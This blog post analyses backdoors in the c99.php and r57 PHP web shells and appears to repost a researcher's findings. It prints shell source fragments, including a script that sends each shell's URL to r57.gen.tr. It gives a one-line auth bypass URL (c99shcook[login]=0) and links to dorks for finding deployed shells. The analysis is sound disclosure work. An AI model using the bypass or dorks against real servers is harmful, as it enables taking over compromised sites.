Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s)
Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s). Do you know this sh3ll? If the answer is Yes, you might be infected!
A recent discovery from @Matthew Bryant - Yahoo! Security Team (thehackerblog.com), found that the most used sh3ll for "Hackers" contain several Backdoor(s) which allows the user to bypass his control and gain the access to itself without knowing the password.
He also found how the site r57.gen.tr TRACKS ON the users allowing the admin to steal all the websites where is located the sh3ll.
1) SH3LL STEALING CODE
Let's focusing on the code:
-----------------------------
[CODE]
mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
1706: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}
mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 11: http://ccteam.ru/releases/c99shell
13:* WEB: http://ccteam.ru
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
99:$accessdeniedmess = "c99shell v.".$shver.": access denied";
103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
599:# Home page: http://ccteam.ru
855:?><?php echo getenv("HTTP_HOST"); ?> - c99shell
!C99Shell v. !
Software:
uname -a: ",1); ?>
",1);} else {echo get_current_user();} ?>
Safe-mode:
1706: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
";}
2912:if ($act == "about") {echo "Credits:
Idea, leading and coding by tristram[CCTeaM].
Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].
Thanks all who report bugs.
All bugs send to tristram's ICQ #656555.";}
2926:
--[ c99shell v. powered by Captain Crunch Security Team | r57 shell | Generation time: ]--
mandatory@mandatorys-box:~/Pentest/c99$
-------------------------------------
But let's see with more attention here:
And then, let's see where this page goes! (http://www.r57.gen.tr/yazciz/ciz.js)
Oops!
"a='+escape(location.href);"
it's not just a SIMPLE JavaScript Instruction, by using that command, the r57.gen.tr admins will be able to steal the sh3lls
of the other people for report them to the admins and/or taking actions with the Law Enforcement!
Ex. http://www.r57.gen.tr/yaz/yaz.php?a=[OUR URL HERE]
2) AUTH BYPASS METHOD
Let's looking into this Code!:
As We see there's an extract command!
With this, the attacker may be able to extracts the values into variables and it means changing how the sh3ll reads the credentials!.
With this, we can see that the variables $login, $md5_pass can be override and so we can bypass them from the sh3ll.
This is the Vulnerable Code:
---------------------------------------
[CODE]//Highlight-code colors------------------------------------------------------------------------------------------------$highlight_background = "#c0c0c0";$highlight_bg = "#FFFFFF";$highlight_comment = "#6A6A6A";$highlight_default = "#0000BB";$highlight_html = "#1300FF";$highlight_keyword = "#007700";$highlight_string = "#000000";@$f = $_REQUEST["f"];@extract($_REQUEST["c99shcook"]);//END CONFIGURATION// \/ Next code isn't for editing \/$tmp = array();if ($login) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if ($login_txt === false) { $login_txt = ""; } elseif (empty($login_txt)) { $login_txt = strip_tags(ereg_replace(" |
", " ", $donated_html)); } header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); }}
This line allows you to overwrite any variable using an array:
@extract($_REQUEST["c99shcook"]);
Which means if we change our URL like below, we can Bypass his restrictions!:
http://127.0.0.1/c99.php?c99shcook[login]=0
Et Voila!, Here is the Result!:
Now, you will know how to bypass the sh3ll restrictions without knowing his Password!
--------------------------------------------------------------------------------------
Source:
Security Researcher *ORIGINAL* Article(s):
1) http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/
2) http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/
c99.php sh3ll Dorks:
http://www.hackingsec.in/2012/04/google-dorks-find-backdoor-c99-find.html
Vulnerable Sh3ll Code:
http://pastebin.com/LCDrr0e8
-------------------------------------
About the Author :
Christian Galeone () is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Upper-Secondary Technical Institute ) attending the IT Programming Class.
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc. His future goal is to be a Cyber Security Specialist working for the National Security in his Country.
